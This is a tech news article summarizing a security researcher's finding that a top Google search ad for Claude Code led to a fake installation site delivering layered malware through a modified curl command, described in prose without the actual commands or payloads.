BotBeat
...
← Back

> ▌

Google / AlphabetGoogle / Alphabet
POLICY & REGULATIONGoogle / Alphabet2026-02-26

Google Serves Malware Through Fake Claude Code Ad in Top Search Result

Key Takeaways

  • ▸A malicious ad for Claude Code appears at the top of Google search results, directing users to a fake installation site that closely mimics Anthropic's legitimate website
  • ▸The malware uses a multi-layered delivery system with base64 encoding, gzip compression, and remote executable downloads to evade detection
  • ▸The attack exploits developers' trust in curl-based installation commands, a common practice in software development
Source:
Hacker Newshttps://minimumviableposts.substack.com/p/google-is-serving-straight-up-malware↗

Summary

Security researcher Adam Geitgey has discovered that Google is serving malware disguised as Claude Code installation instructions through a paid advertisement appearing at the top of search results. When users search for "download claude code," they encounter an ad linking to a fake website that mimics Anthropic's legitimate Claude Code site. The malicious site tricks users into running a compromised curl command that downloads and executes multiple layers of encoded malware payloads.

The attack specifically targets developers' trust in command-line installation processes, modifying the legitimate installation command with a malicious URL. The payload chain includes base64-encoded scripts and gzip files that ultimately download an executable from a known malicious domain and install it at /tmp/helper. The binary has been flagged on multiple malware reporting sites, though its exact payload remains unclear.

This incident highlights ongoing vulnerabilities in Google's advertising verification process, particularly for technical products where users are expected to execute terminal commands. As of the report's publication, the malicious advertisement remained active on Google Search. The case underscores the difficulty users face in reporting security issues to Google and raises questions about the tech giant's responsibility to protect users from sophisticated malware delivery through its advertising platform.

  • The malicious advertisement was still active at the time of reporting, with no clear mechanism for users to report such issues to Google
AI AgentsCybersecurityMarketing & AdvertisingEthics & BiasPrivacy & Data

More from Google / Alphabet

Google / AlphabetGoogle / Alphabet
RESEARCH

Stanford Researchers Use Multi-Agent AI and Reinforcement Learning to Improve HIP Kernel Generation for AMD GPUs

2026-07-04
Google / AlphabetGoogle / Alphabet
PRODUCT LAUNCH

Google Research Launches TabFM, A Zero-Shot Foundation Model for Tabular Data

2026-07-04
Google / AlphabetGoogle / Alphabet
POLICY & REGULATION

Google Loses Appeal Against Record €4.1B EU Antitrust Fine

2026-07-03

Comments

Suggested

MicrosoftMicrosoft
RESEARCH

Microsoft's Leaked 'Aion' Project Reveals Vision for Copilot-First Operating System

2026-07-04
Google / AlphabetGoogle / Alphabet
RESEARCH

Stanford Researchers Use Multi-Agent AI and Reinforcement Learning to Improve HIP Kernel Generation for AMD GPUs

2026-07-04
LLM Agent EcosystemLLM Agent Ecosystem
RESEARCH

Researchers Expose Critical Payload-Less Attack on LLM Agent Supply Chains

2026-07-04
← Back to news
© 2026 BotBeat
AboutPrivacy PolicyTerms of ServiceContact Us